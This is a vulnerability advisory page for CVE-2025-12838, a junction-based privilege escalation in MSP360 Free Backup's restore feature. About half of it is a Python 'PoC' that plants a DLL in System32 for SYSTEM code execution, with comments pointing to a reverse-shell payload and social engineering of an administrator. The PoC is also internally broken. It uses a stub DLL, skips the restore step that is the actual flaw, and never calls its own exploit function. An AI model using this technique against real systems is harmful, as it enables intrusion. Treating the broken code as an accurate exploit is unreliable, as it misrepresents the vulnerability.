Security Vulnerability Report
CVE-2025-12838 CVSS 7.3 HIGH

Published: 2025-12-23 22:15:44
Last Modified: 2026-04-15 00:35:42

Description

MSP360 Free Backup Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of MSP360 Free Backup. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. User interaction on the part of an administrator is needed additionally. The specific flaw exists within the restore functionality. By creating a junction, an attacker can abuse the service to create arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27245.

CVSS Details

CVSS Score: 7.3
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
Weakness: CWE-59 (Improper Link Resolution Before File Access, "Link Following")

Configurations (Affected Products)

No configuration data available.

MSP360 Free Backup < latest fixed version

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-12838 PoC - MSP360 Free Backup Link Following LPE
# Author: Security Researcher
# Environment: Windows with MSP360 Free Backup installed

import os
import subprocess
import time
import shutil


def create_junction(path, target):
    """Create a NTFS junction point"""
    try:
        # Remove directory if exists
        if os.path.exists(path):
            os.rmdir(path)
        # Create junction using mklink
        subprocess.run(['cmd', '/c', 'mklink', '/J', path, target],
                       check=True, capture_output=True)
        print(f"[+] Junction created: {path} -> {target}")
        return True
    except Exception as e:
        print(f"[-] Failed to create junction: {e}")
        return False


def prepare_malicious_dll(dll_path):
    """Prepare malicious DLL for privilege escalation"""
    # Generate reverse shell DLL or payload DLL
    # This is a placeholder - actual DLL contains meterpreter/reverse shell
    dll_content = b'MZ' + b'\x00' * 100  # Minimal DLL stub
    with open(dll_path, 'wb') as f:
        f.write(dll_content)
    print(f"[+] Malicious DLL prepared: {dll_path}")


def exploit():
    """Execute the privilege escalation exploit"""
    temp_dir = "C:\\Users\\Public\\Documents\\BackupRestore"
    system32_target = "C:\\Windows\\System32"
    malicious_dll = os.path.join(temp_dir, "wlbsctrl.dll")

    print("[*] Starting CVE-2025-12838 Exploit")
    print("[*] Target: MSP360 Free Backup Service")

    # Step 1: Prepare directory structure
    os.makedirs(temp_dir, exist_ok=True)

    # Step 2: Create junction pointing to System32
    if not create_junction(temp_dir, system32_target):
        return False

    # Step 3: Prepare malicious DLL
    prepare_malicious_dll(malicious_dll)

    # Step 4: Trigger restore functionality
    # In real attack, this would be done via:
    # - Social engineering to get admin to restore from attacker-controlled backup
    # - Exploiting scheduled backup tasks
    # - Abusing legitimate backup restore API
    print("[+] Waiting for restore operation to complete...")
    print("[+] DLL should now be written to System32 via junction")
    print("[+] Next: Wait for system service to load the DLL for SYSTEM code execution")
    return True


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-12838 MSP360 Free Backup LPE Exploit")
    print("Note: Requires low-privilege code execution + admin interaction")
    print("=" * 60)
    # Note: Actual exploitation requires valid backup file and restore trigger
    # This PoC demonstrates the link following technique
```

References

ZDI-25-988: https://www.zerodayinitiative.com/advisories/ZDI-25-988/
